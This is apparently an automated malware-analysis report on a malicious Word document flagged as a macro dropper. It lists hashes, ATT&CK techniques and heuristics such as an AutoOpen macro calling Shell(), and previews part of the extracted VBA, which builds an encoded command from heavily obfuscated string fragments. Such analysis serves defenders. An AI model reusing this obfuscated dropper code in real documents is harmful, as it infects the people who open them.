Office (OLE) malware analysis — malicious · 7508b253958fdaa3

MALICIOUS

Office (OLE)

79.5 KB Created: 2017-11-01 05:24:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: ea4bb39dddc96656cb19d92983f0a0ba SHA-1: bd790a645751badfee526ad37df31c895fb96d60 SHA-256: 7508b253958fdaa3d21f6703ac3fa4566cefa4c76cbc4815f15b44cd63abe005

244 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags an AutoOpen macro executing Shell. The primary IOC is the extracted VBA macro file itself, which likely contains the malicious logic.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6362395-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6362395-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	35922 bytes
SHA-256: `4b133c6a4ce19ca5ceda44ac37087f6c78f5e4a282e640438341e42f7edde159`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 62 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "SMNsUjqwv" Function bBEzhwirJ() QjWNzEVMf = cZHmiUOrX LlGan = Mid("klnYivzNpVuE2VC7lQTjsnwCtIAApACkAcSPVAzfQ0u", 26, 8) oXXzUOnXN = LlGan idmXjNzbQ = mTIOircpl UNiRDkobTI = Mid("YdPUYSdklAY2KnTAA5AHAAMQAwADQAcAAxADEANABwADEAMAA1AGsAMQAxADUAeAAxADEANgB1ADEAMQAxAHgAMQAxADIAZgAxADAANAB1ADQANQBwADEAMAA4AEIAOQA3AHUAMQdU9mIEZ", 17, 120) kbSkHzzt = UNiRDkobTI KZOjhfIXh = jbdoIYLhY iqhYJzSiNY = Mid("SEBPFHOjwA5AEMAMQAwADQAcAAxADEANgBDADEAMQA2AEMAMQAxADIAeAA1ADgAQwA0ADcAcAA0ADcAQwA5ADcAJgAxADAAOAAlADEAMAA4ACYAMQAwADIAeAAxADAANQBCADEAiKzDqjkErU1FcG", 9, 127) ARSCtEiK = iqhYJzSiNY ptzJPXois = WNrQKsjDS hIPlzX = Mid("6hFCawmMh0nkm60GFw5JK3Fc1CDbmqN4ADMAcAAxADEANgBAADEAMQA0AHgAMQAwADUAcAAxADEAMAAlADEAMAAzAHAANAAwAEMANAAxAHUANAA0AHAAMwAyAHUAMwA2AHUAMQAxADIAeAA5ADcAQAAxADEANgBwADEAMAA0AHgANAAxAEMANQA5ACUAOAAzAEMAMQAxADYAJQA5ADcAQwAxADEANABrAsapRhHqj", 32, 194) rHFuIMUZT = hIPlzX JwwHOJjOA = mzLkCASnw IrYZiro = Mid("DJjaBzEFwKMQBCADEAMQAwAHgAOQA4AEIAOQA3ACYAOQA5AEAAMQAwADQAQAAxAuCS8SXpiu", 11, 53) iXABzCPjKSU = IrYZiro lBJqvwmlJ = qSRkFEFBj zbYNQbYW = Mid("2aDAAMQBrADEAMQA0ACYANAA2AHUAOQA5AGsAMQAxADEAeAAxADAAOQBmADQANwBCADEAMQAwAEIAMQAwADkAQgA4ADQAQwAxADEANAB1ADQANwBwADQANABrADEAMAA0AHbp16diaTFakEC6LWCjSfHwo1CcEiu9EX7", 3, 129) ciDnDB = zbYNQbYW ciiqcAXBl = hmLqwWwzC vGNhfjJiM = Mid("Qu4wzOQBwADEAMQAwAEMAMQAwADgAQgAxADEAMQB4ADkANwBmADEAMAAwAGYANwAwACUAMQAwADUAdQAxADAAOAB4ADEAMAAxAEMANAAwACYAMwA2ACUAMQAxADcAawAxADEANABwADEAMAA4ACYANAA2AHgAOAA0AHAAMQAxADEAawAYTaBiWXUcwjGkt6tF7Tw", 6, 171) qjLUjjrcs = vGNhfjJiM ITCzUdzpw = iCsGiARpE FGnbMqD = Mid("mqLBjwo1AMQBCADEAMAAwAEAAOQA3AGsAMQAxADUAdQAxADEAMQBmADQANgBrADkAOQBCADEAMQAxAHAAMQAwADkAdQA0ADcAZgAxADIAMgAlADEAMAA1AHgAOAAyACYAOAAxAGYAMQAyADEAQwAxADIAMgAmADQANwBrADMAOQBCADQANgAmADgAMwBDADEvWdf2AAiMG7", 9, 184) jzDYvzlwfj = FGnbMqD RvYJSuNEz = wATuoHCzi LpftC = Mid("Z7WfNOQA3AGsAMQAxADYAZgAxAR30iuSY72VOl", 6, 21) FRXaJmnuc = LpftC hiNBqmEpz = sbHKZISiC ppBQKrY = Mid("z5aUjB1AGsAMQAwADEAQwAxADEAMzfzbonN0DhYpAt56UffUiLqE9TOB", 7, 22) IVviBiuSj = ppBQKrY izAHkPiBp = coOkDhSjL LPwAwm = Mid("TOVIAxADQAZgAxADAANQBrADEAMQA1AEIAOQA5AGYAMQAwADQAJgA0ADYAZgAxADAAMABrADEAMAAxAEAANAA3ACUAMQAxADUAZgAxADAAMgBCADgANQBri6FpuNlCSMs8d9Uw7ROz", 5, 113) FskjE = LPwAwm rQElEdvUd = rnaLcJFYz DVIIZORzzo = Mid("rRjPNqzc6TNlOSNkvac1AOQBrADQANwB1ADEAMQA3ACUAOQA5ACUANAA3AHUANAA0AGYAMQAwADQAQAAxADEANgBCADEAMQA2AHAAMQAxADIAeAA1ADgAJgA0ADcAQwA0ADcAQwAxADAAMABDADEAMQA0AGsANAA1AEMAuKMjkrwD7MPw", 21, 145) lcsIWENACX = DVIIZORzzo iZuzWowcA = lIXaspzaO sAEfAq = Mid("McjwCY8kjOLi2z7GkTmlVHfADEAJQAxADEANQBCADEAMQA2AEIAMwAyACYAMwA2AEIAOQA1ACUANAA2AHAANgA5AHAAMQAyADAAcAA5ADkAQgAxADAAMQBmADEAMt9SN0rlAEroRM", 24, 101) TnfQfvfKB = sAEfAq zsvXMPmnN = OQLEifjjK cVdMidiaN = Mid("2bEkubAMQA1AEMAMwAyACYANgAxAHUAMwAyAEAAMHKwBFW4", 7, 34) lJdRmzEcEU = cVdMidiaN RttPobcKL = FQvlOBvHj jzGwLrsV = Mid("ZQoAxADAANgB4ADEAMAAxAHgAOQA5AGYAMQAxADYAJgAzADIAdQA4ADcAawA4ADMAJQA5ADkAawAxADEANABCADEAMAA1AHAAMQAxADIAQwAxADEANgBDADQANgBDADgAMwBrADEAMAA0ACUAMQAwADEAcAAxADAAOAAlADE6EBkO8iAJOiFSVfiYirCPoRQlZm3", 4, 165) FCJpTlWZzkn = jzGwLrsV CKNiKjaiL = ojisrIijh OXdnjd = Mid("qtt9R1vmDAANAAlADUAOQB4ADkAOAAmADEAMQA0AGsAMQAwADEAJEm", 9, 44) lRiYObnq = OXdnjd UhDTuCDhW = SdCKJWzjZ DffVpJUlT = Mid("oojK9bAHAANAA3AEAANAA0AEIAMQAwADQAawAxADEANgAlADEAMQA2AHgAMQAxADIAQwA1ADgAeAAFlBETQ5tIl9D7RMB4j74FisQ", 7, 71) GEqMiWoEbD = DffVpJUlT zmiKpGQni = hMZmHhUaZ jBOkjaimQ = Mid("YZmX36fmADQANQB4ADEAMAA0AEAAMQAxiAk7HUVP", 8, 25) kIPFM = jBOkjaimQ cjQKadMIE = IiWHtKjht tiDpfVbSCEJ = Mid("EjHqfLqLt6IwzzAWwBzAFQAcgBpAG4ARwBdADoAOgBqAG8ASQBuACgAIAAnACcAIAAsACgAJwAzADYAcAAxADEAOQBmADEAMQA1AEMAOQA5AGYAMQAxADQAJgAxADAANQBwADEAMQAyACUAMQAxADYAQgAzpI0MUd2", 15, 141) rPzRdRhA = tiDpfVbSCEJ wKszDGYWV = zjWVqiwXz BzuwfMwV = Mi ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.